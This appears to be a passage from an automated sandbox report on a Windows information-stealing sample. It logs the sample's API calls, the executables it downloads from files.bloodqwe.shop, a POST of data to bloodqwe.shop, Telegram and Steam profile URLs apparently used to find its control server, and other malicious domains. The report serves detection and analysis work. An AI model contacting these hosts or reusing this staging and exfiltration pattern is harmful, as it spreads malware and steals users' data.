Code function: 3_2_00405482 lstrlenA,StrCmpCA,InternetOpenA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,_memmove,lstrlenA,_memmove,lstrlenA,lstrlenA,_memmove,lstrlenA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,StrCmpCA,ExitProcess,InternetCloseHandle,InternetCloseHandle,

3_2_00405482

Source: global traffic	HTTP traffic detected: GET /jamsemlg HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: bloodqwe.shopConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ldms/66f75feece638_ldmg.exe HTTP/1.1Host: files.bloodqwe.shopCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ldms/66f75fd9dc673_vasd.exe HTTP/1.1Host: files.bloodqwe.shopCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /jamsemlg HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=8a305275312b1df9cb_1894863477225248363
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: bloodqwe.shopConnection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: bloodqwe.shop
Source: global traffic	DNS traffic detected: DNS query: files.bloodqwe.shop
Source: global traffic	DNS traffic detected: DNS query: offensivedzvju.shop
Source: global traffic	DNS traffic detected: DNS query: cowod.hopto.org

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFIJEGIDBGIECAKKEGDHost: bloodqwe.shopContent-Length: 255Connection: Keep-AliveCache-Control: no-cache

Source: file.exe, GCGHJEBGHJ.exe.3.dr, 66f75feece638_ldmg[1].exe.3.dr, JKFIDGDHJE.exe.3.dr	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe, GCGHJEBGHJ.exe.3.dr, 66f75feece638_ldmg[1].exe.3.dr, JKFIDGDHJE.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: file.exe, softokn3.dll.3.dr, GCGHJEBGHJ.exe.3.dr, 66f75feece638_ldmg[1].exe.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, JKFIDGDHJE.exe.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: RegAsm.exe, 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.JECFIEBFHIEG
Source: RegAsm.exe, 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto
Source: RegAsm.exe, 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.
Source: RegAsm.exe, 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.BFHIEG
Source: RegAsm.exe, 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001757000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org/
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001757000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org/e
Source: RegAsm.exe, 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.orgIEG
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: RegAsm.exe, 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hoptoEBFHIEG
Source: file.exe, GCGHJEBGHJ.exe.3.dr, 66f75feece638_ldmg[1].exe.3.dr, JKFIDGDHJE.exe.3.dr	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: file.exe, GCGHJEBGHJ.exe.3.dr, 66f75feece638_ldmg[1].exe.3.dr, JKFIDGDHJE.exe.3.dr	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, GCGHJEBGHJ.exe.3.dr, 66f75feece638_ldmg[1].exe.3.dr, JKFIDGDHJE.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: file.exe, softokn3.dll.3.dr, GCGHJEBGHJ.exe.3.dr, 66f75feece638_ldmg[1].exe.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, JKFIDGDHJE.exe.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, GCGHJEBGHJ.exe.3.dr, 66f75feece638_ldmg[1].exe.3.dr, JKFIDGDHJE.exe.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: GCGHJEBGHJ.exe, 00000008.00000002.2606018401.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.microsoft.c
Source: file.exe, softokn3.dll.3.dr, GCGHJEBGHJ.exe.3.dr, 66f75feece638_ldmg[1].exe.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, JKFIDGDHJE.exe.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, softokn3.dll.3.dr, GCGHJEBGHJ.exe.3.dr, 66f75feece638_ldmg[1].exe.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, JKFIDGDHJE.exe.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: file.exe, GCGHJEBGHJ.exe.3.dr, 66f75feece638_ldmg[1].exe.3.dr, JKFIDGDHJE.exe.3.dr	String found in binary or memory: http://ocsp.entrust.net02
Source: file.exe, GCGHJEBGHJ.exe.3.dr, 66f75feece638_ldmg[1].exe.3.dr, JKFIDGDHJE.exe.3.dr	String found in binary or memory: http://ocsp.entrust.net03
Source: Amcache.hve.17.dr	String found in binary or memory: http://upx.sf.net
Source: file.exe, softokn3.dll.3.dr, GCGHJEBGHJ.exe.3.dr, 66f75feece638_ldmg[1].exe.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, JKFIDGDHJE.exe.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, GCGHJEBGHJ.exe.3.dr, 66f75feece638_ldmg[1].exe.3.dr, JKFIDGDHJE.exe.3.dr	String found in binary or memory: http://www.entrust.net/rpa03
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mozglue.dll.3.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: GCBFBG.3.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001591000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2973194670.0000000001203000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2973194670.00000000011D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bloodqwe.shop/
Source: RegAsm.exe, 0000001D.00000002.2973194670.0000000001203000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bloodqwe.shop/#
Source: RegAsm.exe, 0000001D.00000002.2973194670.0000000001203000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bloodqwe.shop/:4
Source: RegAsm.exe, 0000001D.00000002.2973194670.0000000001203000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bloodqwe.shop/D
Source: RegAsm.exe, 0000001D.00000002.2973194670.0000000001203000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bloodqwe.shop/ERg
Source: RegAsm.exe, 0000001D.00000002.2973194670.0000000001203000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bloodqwe.shop/FIECBGDG
Source: RegAsm.exe, 0000001D.00000002.2973194670.0000000001203000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bloodqwe.shop/H
Source: RegAsm.exe, 0000001D.00000002.2973194670.0000000001203000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bloodqwe.shop/er
Source: RegAsm.exe, 0000001D.00000002.2973194670.0000000001203000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bloodqwe.shop/i
Source: RegAsm.exe, 0000001D.00000002.2973194670.0000000001203000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bloodqwe.shop/p
Source: RegAsm.exe, 0000001D.00000002.2973194670.0000000001203000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bloodqwe.shop/w
Source: RegAsm.exe, 0000001D.00000002.2971207252.000000000098E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2971207252.0000000000A9B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://bloodqwe.shop:443
Source: RegAsm.exe, 0000001D.00000002.2971207252.00000000009C4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://bloodqwe.shop:4438.134
Source: RegAsm.exe, 0000001D.00000002.2971207252.0000000000A9B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://bloodqwe.shop:443Local
Source: RegAsm.exe, 0000001D.00000002.2971207252.0000000000A9B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://bloodqwe.shop:443csrss.exe
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001591000.00000004.00000020.00020000.00000000.sdmp, AECAKE.3.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001591000.00000004.00000020.00020000.00000000.sdmp, AECAKE.3.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: GCBFBG.3.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: GCBFBG.3.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: GCBFBG.3.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001591000.00000004.00000020.00020000.00000000.sdmp, AECAKE.3.dr	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001591000.00000004.00000020.00020000.00000000.sdmp, AECAKE.3.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: GCBFBG.3.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: GCBFBG.3.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: GCBFBG.3.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001580000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://files.bloodqwe.shop/$~
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001580000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://files.bloodqwe.shop/2~
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001564000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://files.bloodqwe.shop/ldms/66f75fd9dc673_vasd.exe
Source: RegAsm.exe, 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://files.bloodqwe.shop/ldms/66f75fd9dc673_vasd.exeta;
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001564000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://files.bloodqwe.shop/ldms/66f75feece638_ldmg.exe
Source: RegAsm.exe, 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://files.bloodqwe.shop/ldms/66f75feece638_ldmg.exe1kkkk1237658https://files.bloodqwe.shop/ldms/
Source: RegAsm.exe, 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://files.bloodqwe.shop/ldms/66f75feece638_ldmg.exeta;
Source: AECAKE.3.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: https://mozilla.org0/
Source: RegAsm.exe, 0000000D.00000002.2667736054.0000000000E8B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2667736054.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://offensivedzvju.shop/
Source: RegAsm.exe, 0000000D.00000002.2667736054.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://offensivedzvju.shop/api
Source: RegAsm.exe, 0000000D.00000002.2667736054.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://offensivedzvju.shop/pi
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, JKFIDGDHJE.exe, 00000013.00000002.2710042416.000000000459B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2971207252.0000000000437000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001564000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2973194670.00000000011D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, JKFIDGDHJE.exe, 00000013.00000002.2710042416.000000000459B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2971207252.0000000000437000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5ed
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, JKFIDGDHJE.exe, 00000013.00000002.2710042416.000000000459B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2971207252.0000000000437000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5edu55uhttps://steamcommunity.com/profiles/76561199780418869sql.dllsqlp.dllMozilla/5.
Source: RegAsm.exe, 0000001D.00000002.2973194670.00000000011D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/dZ
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001564000.00000004.00000020.00020000.00000000.sdmp, JKFIDGDHJE.exe, 00000013.00000002.2710042416.000000000459B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2971207252.0000000000437000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2973194670.000000000118A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2973194670.0000000001203000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2973194670.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2971207252.000000000098E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/jamsemlg
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, JKFIDGDHJE.exe, 00000013.00000002.2710042416.000000000459B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2971207252.0000000000437000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/jamsemlgdsgwegsdhttps://steamcommunity.com/profiles/76561199780418869u55uMozilla/5.0
Source: RegAsm.exe, 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2728647991.0000000001564000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2973194670.0000000001203000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001591000.00000004.00000020.00020000.00000000.sdmp, AECAKE.3.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: RegAsm.exe, 0000000D.00000002.2667736054.0000000000E8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: GCBFBG.3.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, GCGHJEBGHJ.exe.3.dr, 66f75feece638_ldmg[1].exe.3.dr, JKFIDGDHJE.exe.3.dr	String found in binary or memory: https://www.entrust.net/rpa0
Source: GCBFBG.3.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001591000.00000004.00000020.00020000.00000000.sdmp, AECAKE.3.dr	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

